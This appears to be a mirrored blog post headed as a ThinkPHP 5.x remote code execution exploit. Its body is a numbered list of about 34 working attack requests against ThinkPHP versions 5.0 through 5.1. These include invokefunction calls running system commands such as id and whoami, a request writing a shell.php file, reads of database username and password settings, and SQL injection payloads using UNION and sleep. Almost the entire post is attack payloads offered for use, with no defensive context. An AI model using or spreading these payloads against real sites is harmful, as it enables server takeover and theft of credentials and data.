zoukankan      html  css  js  c++  java
  • think php 5.x

    # Exploit Title: thinkphp 5.X RCE
    # Date: 2019-1-14
    # Exploit Author: vr_system
    # Vendor Homepage: http://www.thinkphp.cn/
    # Software Link: http://www.thinkphp.cn/down.html
    # Version: 5.x
    # Tested on: windows 7/10
    # CVE : None
    
    https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
    
    1、https://blog.thinkphp.cn/869075
    2、https://blog.thinkphp.cn/910675
    
    POC:
    
    thinkphp 5.0.22
    1、http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.username
    2、http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.password
    3、http://url/to/thinkphp_5.0.22/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    4、http://url/to/thinkphp_5.0.22/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    
    thinkphp 5
    5、http://127.0.0.1/tp5/public/?s=index/	hinkView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
    
    thinkphp 5.0.21
    6、http://localhost/thinkphp_5.0.21/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    7、http://localhost/thinkphp_5.0.21/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    
    thinkphp 5.1.*
    8、http://url/to/thinkphp5.1.29/?s=index/	hinkRequest/input&filter=phpinfo&data=1
    9、http://url/to/thinkphp5.1.29/?s=index/	hinkRequest/input&filter=system&data=cmd
    10、http://url/to/thinkphp5.1.29/?s=index/	hink	emplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
    11、http://url/to/thinkphp5.1.29/?s=index/	hinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E
    12、http://url/to/thinkphp5.1.29/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    13、http://url/to/thinkphp5.1.29/?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
    14、http://url/to/thinkphp5.1.29/?s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    15、http://url/to/thinkphp5.1.29/?s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
    
    未知版本
    16、?s=index/	hinkmodule/action/param1/${@phpinfo()}
    17、?s=index/	hinkModule/Action/Param/${@phpinfo()}
    18、?s=index/	hink/module/aciton/param1/${@print(THINK_VERSION)}
    19、index.php?s=/home/article/view_recent/name/1' 
    header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
    20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
    21、index.php?s=/home/shopcart/getpriceNum/id/1%27
    22、index.php?s=/home/user/cut/id/1%27
    23、index.php?s=/home/service/index/id/1%27
    24、index.php?s=/home/pay/chongzhi/orderid/1%27
    25、index.php?s=/home/pay/index/orderid/1%27
    26、index.php?s=/home/order/complete/id/1%27
    27、index.php?s=/home/order/complete/id/1%27
    28、index.php?s=/home/order/detail/id/1%27
    29、index.php?s=/home/order/cancel/id/1%27
    30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
    31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"
    1') union select sleep('''+str(sleep_time)+''')#
    
    thinkphp 5.0.23(完整版)debug模式
    32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
    
    thinkphp 5.0.23(完整版)
    33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
    
    thhinkphp 5.0.10(完整版)
    34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
                
  • 相关阅读:
    POJ 3710 Christmas Game#经典图SG博弈
    POJ 2599 A funny game#树形SG(DFS实现)
    POJ 2425 A Chess Game#树形SG
    LeetCode Array Easy 122. Best Time to Buy and Sell Stock II
    LeetCode Array Easy121. Best Time to Buy and Sell Stock
    LeetCode Array Easy 119. Pascal's Triangle II
    LeetCode Array Easy 118. Pascal's Triangle
    LeetCode Array Easy 88. Merge Sorted Array
    ASP.NET MVC 学习笔记之 MVC + EF中的EO DTO ViewModel
    ASP.NET MVC 学习笔记之面向切面编程与过滤器
  • 原文地址:https://www.cnblogs.com/csnd/p/12291915.html
Copyright © 2011-2022 走看看